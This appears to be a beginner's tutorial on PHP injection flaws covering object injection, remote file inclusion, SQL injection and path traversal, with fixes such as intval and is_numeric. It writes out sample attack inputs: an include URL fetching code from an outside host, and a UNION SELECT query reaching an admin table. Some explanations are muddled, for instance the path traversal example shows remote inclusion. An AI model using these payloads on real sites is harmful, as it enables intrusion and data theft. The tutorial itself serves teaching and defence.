Understanding PHP Object Injection

PHP injection or PHP Object Injection is an application level vulnerability that allows an attacker to perform various kinds of malicious attacks such as SQL Injection, Application Denial of Service, Code Injection and Path Traversal based on the context. The vulnerability generally occurs when the input supplied by the user is not sanitized properly before passing to the unserialize()PHP function(takes single serialized variable and converts it into the PHP value). PHP contains the object serialization feature that allows attackers to pass serialized strings to a vulnerable unserialize() call. This results in an arbitrary PHP object injection into the scope of the application. Serialized strings are those that create representations of the values that can be stored.

In order to exploit the PHP Object Injection vulnerability completely, two conditions should be met:

1)     The application should have a class that implements a PHP magic method (like _destruct, _construct, _set or _wakeup) that can be used to carry out different malicious attacks.

2)     All the classes that are used during an attack should be declared when the function unserialize() is being called, else object autoloading should be supported for those classes.

Learn about PHP programming by taking a course at Udemy.com

PHP code injection:

When a code is injected straight from an outside source into a script or a program for the execution at any point of time, the process is known as code injection. The example below will help you to gain a better understanding of PHP code injection vulnerability:

.. headerhtml ..
<?php 
include ('$page');
?>
.. footerhtml ..

The header and footer do not contain any PHP code. It will only include the HTML code and may appear like a big mistake. The attacker can choose whatever he wants to include since the variable “$page” is never checked. So, how it is possible to exploit the above code?

Exploit example:

An attacker can include the ‘txt’ file in the above example by creating the ‘txt’ file in another server. This ‘txt’ file may contain the PHP code that will be executed on exploited host.

<?php
phpinfo();
?>

Suppose the location of the vulnerable code is ‘http://domain1/index.php’ and the location of the ‘txt’ file is ‘http://domain3/vulcode.txt’, the attacker could write a small line in his browser that might look like this:

http://domain1/index.php?page=http://domain3/vulcode.txt  

In the end the command ‘phpinfo()’ will be executed within the header and the footer where the PHP include is located.

The function ‘include()’ receives data from another file that is defined within the brackets (). Let’s assume that the url mentioned above is pasted in the browser. The ‘include’ function defines the $page variable that contains ‘http://domain3/vulcode.txt’, so let’s replace all the variable of $page with this string:

... html header ...
<?php
include ('http://domain3/vulcode.txt');
?>... html footer ...

Now the code will be taken from the url by the include function and placed where it was called.

... html header ...
<?php
phpinfo();
?>
... html footer ...

This will be processed by the server. Here, the header will be displayed and the phpinfo() will be executed after that. Finally, the footer will be displayed.

Learn PHP programming from scratch by taking an online class at Udemy.com

Problems it can cause:

This totally depends on the attacker as he can create multiple problems. The attacker can create malicious code that can cause the following problems:

• It is possible for an attacker to obtain your database username and password.
• An attacker can send spam to different email addresses using your website.
• An attacker can deface your website.
• An attacker can gain access to your private information.
• An attacker can gain access to the server of any website.

PHP SQL injection:

PHP SQL injection is a code injection technique that is used for attacking data-driven applications where malicious statements can be inserted into the entry field for execution. This problem occurs when the input variables entered by the user are not carefully checked by the programmer.

Example:

...
$id=$_GET["id"];
$res=mysql_query("SELECT * from art where id=$id;");
...

Exploit:

page.php?id=0 UNION SELECT * FROM admin

Here the variable $id is not checked carefully and will be processed in the SQL query. The server will finally get:

SELECT * from art where id=0 
          UNION SELECT * FROM admin;

The variable $id is expected to be a number, so it can be checked as a precautionary measure. A general approach is to remove all the illegal content from the variable instead of checking and displaying the error messages. The following are two approaches you can take:

...
$id=intval($_GET["id"]);
...

The above code contains the intval function that is used for obtaining integer values. The code will remove any possible illegal content from the variable.

...
$id=$_GET["id"];
if (!is_numeric($id)) {
          ... handling error ...
}
 else
 {
          ... continue ...
}
...

The above code will check the “if” condition and if the $id variable contains any content other than numbers, it will handle the error. However, if it contains numeric values, the execution will continue.

Path traversal:

Path traversal accesses the files and directories that are placed outside of the web root folder. The attacker searches the absolute links of the files stored on the web server by browsing through the application. Accessing the arbitrary files and directories stored on the file system is possible by manipulating the variables that are referred by the “dot-dot slash (../)” sequences. The attacker generally uses “…/” sequences for moving up to the root directory.

Example:

http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php   

You can include the scripts and files located on external websites. As shown in the example above, the file “malicious-code.php” will be included.

New to PHP? Learn the basics by taking an online class at Udemy.com

Conclusion:

PHP injection is an application level vulnerability that opens a door to the attacker, thus allowing him to perform malicious attacks such as SQL injection and code injection. An attacker can create different kinds of damages and can destroy the user’s privacy in an instant. Therefore, necessary precautions need to be taken. This will definitely help you protect your privacy and stops several malicious attacks from hackers.